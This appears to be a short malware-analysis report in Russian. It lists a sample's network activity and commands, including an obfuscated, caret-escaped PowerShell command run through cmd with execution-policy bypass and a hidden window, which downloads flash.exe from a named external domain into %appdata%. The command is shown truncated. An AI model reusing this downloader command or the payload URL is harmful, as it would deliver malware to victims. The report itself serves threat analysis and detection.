Техническая информация
- http://www.huntermason.com.au/priv/flash.exe как %appdata%.exe
- '<SYSTEM32>\cmd.exe' /c "pOw^Er^s^HE^l^l.e^XE ^-^ex^E^C^uTI^ONP^ol^i^C^y^ bYPass -NoP^ro^F^Il^e -w^I^ndo^wstYLE hiD^DEN^ ^(new-^o^BJe^ct SYSt^Em^.n^e^T.W^EBCL^IeNt^)^.DOWNl^oaDfIlE^('http://www.huntermas...
- 'hu####mason.com.au':80
- 'hu####mason.com.au':443
- http://www.hu####mason.com.au/priv/flash.exe
- 'hu####mason.com.au':443
- DNS ASK hu####mason.com.au
- '<SYSTEM32>\cmd.exe' /c "pOw^Er^s^HE^l^l.e^XE ^-^ex^E^C^uTI^ONP^ol^i^C^y^ bYPass -NoP^ro^F^Il^e -w^I^ndo^wstYLE hiD^DEN^ ^(new-^o^BJe^ct SYSt^Em^.n^e^T.W^EBCL^IeNt^)^.DOWNl^oaDfIlE^('http://www.huntermas...' (со скрытым окном)